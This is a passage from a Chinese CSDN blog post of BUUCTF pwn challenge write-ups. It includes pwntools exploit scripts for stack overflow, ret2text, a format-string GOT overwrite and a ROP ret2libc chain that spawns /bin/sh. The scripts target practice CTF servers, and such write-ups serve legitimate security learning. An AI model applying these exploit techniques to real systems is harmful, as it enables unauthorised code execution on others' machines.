【BUUCTF】

最新推荐文章于 2024-09-02 23:14:47 发布
最新推荐文章于 2024-09-02 23:14:47 发布
阅读量338 收藏 5
点赞数 3
分类专栏: PWN题目记录 文章标签: python linux 网络安全 经验分享
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_72981769/article/details/141114878
版权

【BUUCTF】
test_your_nc
后门函数直接打通即得flag

Rip
【64位system函数栈对齐(timeout问题)但其实Got EOF while reading in interactive😓】
关键词:8bite 16进一 末尾对齐(可看成循环:0 8)
参考CSAPP第九章对应内容【之后详细补充】image-20230426151805331
image-20230420211423102

image-20230420204627842

image-20230420211953066

下附两种版本exp(😜)

from pwn import  *  #调用pwntools库

r = remote('node4.buuoj.cn',28668)     #远程连接

offset = 0xF + 8    #偏移量
payload = b'A'*offset + p64(0x0040118A)  #漏洞利用

r.sendline(payload)		#发送漏洞
r.interactive()		#远程交互
出现无timeout问题exp 直接溢出至"/bin/sh"
from pwn import *
p=remote("node4.buuoj.cn",26255)
payload=b'A'*23+p64(0x401016)+p64(0x401186)+p64(0) #加1去跳过一个栈操作指令,使其对齐16字节
p.sendline(payload)
p.interactive()

from pwn import *
p=remote("node4.buuoj.cn",26255)
payload=b'A'*23+p64(0x401186+1)#0x401016是一个ret指令, p64(0)是system函数的返回地【不加也能通】
p.sendline(payload)
p.interactive()

可见函数从0x401186开始,但timeout【64位栈对齐+1(但不一定保证+1后下一地址一定为栈指令如{move 好几字节})】

warmup_csaw_2016
image-20230422143956763

from pwn import *
io = remote("node4.buuoj.cn",29500)
payload = b'A'*72 + p64(0x40060D)
io.sendline(payload)
io.interactive()

image-20230422144026552

可以看到和第二题思路一致(“/bin/sh"换成"cat flag.txt")
image-20230422144218423

问题 exp编写过程起始位置+1对齐仍出现timeout但有flag回显【或许环境问题?】

ciscn_2019_n_1image-20230426130830424

image-20230426130853492

进func()函数查看发现gets溢出及system函数对应flag内容
两种思路:(1)利用gets溢出返回至system地址得flag
(2)溢出至v2位置修改v2==11.28125【IDA中找11.28125对应十六进制地址】image-20230426133836525

image-20230426130737576

下附两种exp

from pwn import *
io = remote("node4.buuoj.cn",25080)
payload = b'A'*(0x30+8) + p64(0x4006BE)#gets yichudao 'cat/flag'
io.sendline(payload)
io.interactive()

from pwn import *
io = remote('node3.buuoj.cn',25080)
offset = 0x30 -0x4
payload = offset*'a' + p64(0x41348000)
#利用gets函数不限制输入多少,先填充v1,然后v2 = 11.28125.
#这里的11.28125要转换成16进制,这个可以在IDA里找到。
io.sendline(payload)
io.interactive()

pwn1_sctf_2016
(1)checksec

image-20230602164307388

image-20230602164509786

​ 运行猜测 代码中有将I替换成you的过程
(2)IDA
image-20230602165551602

image-20230602165901545

image-20230602181338684
搜索字符串发现flag.txtimage-20230602165924110

找到getflag函数
image-20230602170330127

刚好发现system(返回地址)

exp:

from pwn import *
#context.log_level='debug' #加不加都可以
p=remote('node3.buuoj.cn',xxxx)
payload='I'*20 + 'junk' +p32(0x08048F13)
p.sendline(payload)
p.interactive()

jarvisoj_level0

简单的ret2text
exp:

from pwn import *
#p = process("./level0")
p = remote("node4.buuoj.cn",26219)
sys_addr = 0x40059F
bin_addr = 0x40059A

p.recvuntil("Hello, World\n")
payload = b'A' *0x80 +b'deadbeef' +p64(bin_addr) + p64(sys_addr)

p.sendline(payload)
p.interactive()

[第五空间2019 决赛]PWN5

就是一整个给我整蒙了 格式化字符串 知识盲区捏
(1)checksec
image-20230609145009123

我说有点意思 32位canary
(2)好奇进IDA(然后人就傻了 )啊?这是什么漏洞 动调也很迷茫

image-20230609145503345

(3)上文章链接 等一一整个复现
(https://blog.csdn.net/weixin_52111404/article/details/126113277)

补档:(https://www.yuque.com/cyberangel/rg9gdm/xz3474)

exp:

from pwn import *
#context.log_level = "DEBUG"
io = remote("node4.buuoj.cn",25485)
#io = process("./pwn")

elf = ELF('./pwn')
atoi_got = elf.got['atoi']
system_sym = elf.sym['system']

print("atoi_got:",hex(atoi_got))
print("system_sym:",hex(system_sym))
payload=fmtstr_payload(10,{atoi_got:system_sym})
io.sendline(payload)
io.sendline(b'/bin/sh\x00')
io.interactive()

(1)checksec
image-20230609152349276

ret2text pass
(2)IDA
image-20230609153112187

可以看到加解密吼
image-20230609153245270

发现漏洞 其他均是依据ASCII进行异或解密

无system “/bin/sh” NX打开 ret2text ret2shellcode pass
看见puts函数想到ret2libc
构造ROP泄露libc基址

image-20230609154201972

exp:

from pwn import *
from LibcSearcher import *
context.log_level='debug'
r = remote('node4.buuoj.cn',26787)
elf = ELF('./1')
ret = 0x4006b9
pop_rdi_addr = 0x400c83
puts_plt = elf.plt["puts"]
puts_got = elf.got["puts"]
main_addr = elf.sym["main"]
r.sendlineafter(b"Input your choice!\n",b'1')
payload = b'\x00'+b'a'*0x57+p64(pop_rdi_addr)+p64(puts_got)+p64(puts_plt)+p64(main_addr)
r.recvuntil(b"encrypted\n")
r.sendline(payload)
r.recvuntil(b"Ciphertext\n")
#
r.recvuntil(b"\n")
#
puts_addr = u64(r.recvline()[:-1].ljust(8,b'\0'))
print(hex(puts_addr))
libc = LibcSearcher("puts",puts_addr)
libc_base = puts_addr - libc.dump("puts")
system_addr = libc_base+libc.dump("system")
bin_sh = libc_base+libc.dump("str_bin_sh")
r.sendlineafter(b"Input your choice!\n",b'1')
#
payload1 = b'\x00'+b'a'*0x57+p64(ret)+p64(pop_rdi_addr)+p64(bin_sh)+p64(system_addr)
#
r.recvuntil(b"encrypted\n")
r.sendline(payload1)
r.interactive()

from pwn import *
from LibcSearcher import *
context.log_level='debug'
r = remote('node4.buuoj.cn',26787)
#r=process('./1')
elf = ELF('./1')
ret = 0x4006b9
pop_rdi_addr = 0x400c83
puts_plt = elf.plt["puts"]
puts_got = elf.got["puts"]
main_addr = elf.sym["main"]
r.sendlineafter(b"Input your choice!\n",b'1')
payload = b'\x00'+b'a'*0x57+p64(pop_rdi_addr)+p64(puts_got)+p64(puts_plt)+p64(main_addr)
r.recvuntil(b"encrypted\n")
r.sendline(payload)
r.recvuntil(b"Ciphertext\n")
#
r.recvuntil(b"\n")
#
puts_addr = u64(r.recvline()[:-1].ljust(8,b'\0'))
print(hex(puts_addr))
libc = LibcSearcher("puts",puts_addr)
libc_base = puts_addr - libc.dump("puts")
system_addr = libc_base+libc.dump("system")
bin_sh = libc_base+libc.dump("str_bin_sh")
r.sendlineafter(b"Input your choice!\n",b'1')
#
payload1 = b'\x00'+b'a'*0x57+p64(ret)+p64(pop_rdi_addr)+p64(bin_sh)+p64(system_addr)
#
r.recvuntil(b"encrypted\n")
r.sendline(payload1)
r.interactive()

p(“system”)
bin_sh = libc_base+libc.dump(“str_bin_sh”)
r.sendlineafter(b"Input your choice!\n",b’1’)

payload1 = b’\x00’+b’a’*0x57+p64(ret)+p64(pop_rdi_addr)+p64(bin_sh)+p64(system_addr)

r.recvuntil(b"encrypted\n")
r.sendline(payload1)
r.interactive()
yub.o
关注
  • 3
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF-PWN刷题记录25(IO file attack)
weixin_44145820的博客
08-14 1590
背景知识 在做关于IO FILE的攻击的时候,对其中涉及的数据结构的了解必不可少,以下是几个关键的数据结构 FILE 结构 定义在 libio.h 中,如下 struct _IO_FILE { int _flags; /* High-order word is _IO_MAGIC; rest is flags. */ #define _IO_file_flags _flags /* The following pointers correspond to the C++ strea
BUUCTF
Q221022的博客
02-12 1242
1.old-fashion 直接用quiqiup解密即可得到flag 2.世上无难事 看到答案是32位,我就想到了MD5,然后用MD5解密,不对,不是MD5,所以就用quipqiup试试,key就出来了 3.RSA3 题上有两组c和e,只有一个n,(所以猜测这两组应该用的是同一个n)将n分解成p和q(不知道为什么,我用了三个网站都没分解出来,是因为数字太大吗?)然后,就可以求出私钥d,进而解密出m ,得到答案 4.RSA2 dp=d mod (p-1) 我认为..
buuctf realloc _IO_2_1_stdout_泄露libc地址 32位格式化字符串 UAF diff SSH SCP jmp-rsp orw seccomp_tools
carol2358的博客
08-01 753
文章目录roarctf_2019_realloc_magic roarctf_2019_realloc_magic 贴几个链接: https://blog.csdn.net/weixin_44145820/article/details/105585889 https://blog.csdn.net/seaaseesa/article/details/105590591 https://blog.csdn.net/weixin_42151611/article/details/99228675 exp:
BUUCTF题目(含工具),你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”入坑CTF,先入手杂项部分
04-09
BUUCTF题目(含工具),你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”入坑CTF,先入手杂项部分
BUUCTF逆向前八题
01-24
在本篇中,我们将探讨在BUUCTF储备赛中遇到的前八道逆向题目,通过这些题目来学习如何使用逆向工具,如exeinfo和IDA,以及如何解析汇编代码以获取关键信息。 1. Easyre: 这道题首先使用exeinfo查看文件信息,确认...
1ncrd#Study-Record#BUUCTF[第二章 web进阶]XSS闯关1.md
08-10
一些关于xss的payload
BUUCTF详细解析,你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”入坑CTF,先入手杂项部分
04-09
BUUCTF详细解析,你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”入坑CTF,先入手杂项部分,
python】关于判断空值None、判断len()=0,和 if not 的区别
Meggie35的博客
08-28 7376
python的“空”与“无”之辩,关于None,和空数值。在程序中,判断里面没有值和判断东西是不是为空,也是不一样的东西,我们可以往下看看具体的区别。
爬取长篇小说:选择何种IP策略最佳?
KookeeyLena5的博客
08-29 467
在爬取长篇小说时,选择合适的IP策略至关重要。根据目标网站的反爬虫机制、请求频率限制以及爬取需求的不同,可以选择静态IP、动态IP、住宅IP或数据中心IP等不同类型的IP地址。同时,使用代理服务器或VPN等工具可以进一步提高爬取的稳定性和效率。在爬取过程中,应遵循最佳实践,确保爬取行为的合法性和稳定性。
CUDA编程08 - 并行编程思维
最新发布
GPU全栈博主-程序哥
09-02 1052
到目前为止,我们集中于学习并行编程的实用知识,包括CUDA编程接口特性、GPU架构、性能优化技术、并行模式和应用案例研究。在本章中,我们将讨论更为抽象的概念。我们将并行编程概括为一种思维过程,即设计或选择并行算法,并将一个实际问题分解基本的工作单元,这些工作单元可以由所选的算法高效地执行。具备强大思维技能的程序员不仅会分析问题,还会转变实际问题的结构:哪些部分本质上是串行的,哪些部分适合并行执行,以及将前者的部分转移到后者所涉及的一些权衡。
Python 高级特效 - 生成器 ( Generator)
weixin_48591974的博客
08-31 499
生成器是一种一边循环一边计算的机制,通过列表生成式,可以直接创建一个列表,但是受到内存的限制,列表容量是有限的,当列表元素很 大的时候,会很浪费内存空间。所以可以通过生成器 Generator 生成,它的作用相比列表,内存占用少,节约资源
Python报错已解决】`TypeError: ‘numpy.ndarray‘ object is not callable`
鸽芷咕的博客
09-01 282
在编程中,你是否遇到过尝试调用一个Numpy数组对象时出现了`TypeError: 'numpy.ndarray' object is not callable`的报错?这个问题通常是由于误将Numpy数组当成了一个函数来调用。接下来,我们将分析这个问题并提供解决方案。
BeautifulSoup:Python网页解析库详解
零度°C的博客
08-30 796
是一个Python库,用于从HTML或XML文件中提取数据。它能够通过简单的方法处理复杂的HTML文档,并且很容易就能找到你需要的标签和数据。
yield:生成器
mohen_777的博客
08-28 1184
作为生成器,因为每次迭代就会返回一个值,所以不能显示的在生成器函数中return 某个值,包括None值也不行,否则会抛出“SyntaxError”的异常,但是在函数中可以出现单独的return,表示结束该语句。使用yield,可以让函数生成一个序列,该函数返回的对象类型是"generator",通过该对象连续调用next()方法返回序列值。另外一种说法:生成器就是一个返回迭代器的函数,与普通函数的区别是生成器包含yield语句,更简单点理解生成器就是一个迭代器。处为止,next()的返回值就是生成值。
java 基于Swing的随机点名
tonysong111073的专栏
09-02 159
使用java的swing开发的随机点名
python json jsonl 的用法
大多_C的博客
08-28 1619
JSONL格式是一种非常实用的数据存储格式,特别适合处理大型、结构化的数据集。逐行读取:有效处理大文件,节省内存。简便性:每一行都是独立的JSON对象,便于解析和处理。灵活性:可以很容易地将数据追加到已有文件中。通过上述方法,您可以轻松地在Python中读取、写入和处理JSONL格式的数据。
Python开源项目周排行 2024年第14周
cbbxn的博客
08-29 1501
注:当前文章会不定期进行更新。标签: 音频 AIGC。
python方法介绍
weixin_67832625的博客
08-28 1127
前言导读:Python的创始⼈人为吉多·范罗苏姆(Guido van Rossum)。1989年年的圣诞节期间,吉多·范罗苏姆为了了在阿姆斯特丹打发时间,决⼼开发一个新的脚本解释程序,作为ABC语言的一种继承。其诞生于1990年;
buuctf wireshark
09-12
根据您提供的引用内容,buuctf wireshark 是一个与buuctf比赛相关的题目。其中,Wireshark 是一个网络封包分析软件,可以用来捕获和分析网络数据包。根据[1]中提供的下载地址,可以下载 Wireshark 软件进行使用。 在buuctf wireshark题目中,黑客通过使用Wireshark抓到了管理员登陆网站时的一段流量包,并将其中的密码作为flag。解题思路是使用Wireshark打开下载的文件,然后根据题目提示,在流量包中找到管理员登陆网站时的请求,该请求方式为POST类型,可以通过过滤条件 `http.request.method==POST` 来筛选出该请求。在该请求中,可以找到管理员的密码,作为flag提交。 不过,需要注意的是,获取到的flag需要加上 `flag{}` 并进行提交。 此外,根据中的提到的方法,您也可以直接将下载的图片文件扔到WinHex中进行查看,以便寻找是否存在flag。但是,请注意在buuctf wireshark题目中的具体解题思路仍然是通过Wireshark分析流量包。 总结起来,对于buuctf wireshark题目,您需要下载Wireshark软件,打开下载的文件,并根据题目提示找到管理员登陆网站时的流量包,从中获取管理员的密码作为flag,最后在提交flag时记得加上 `flag{}`。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值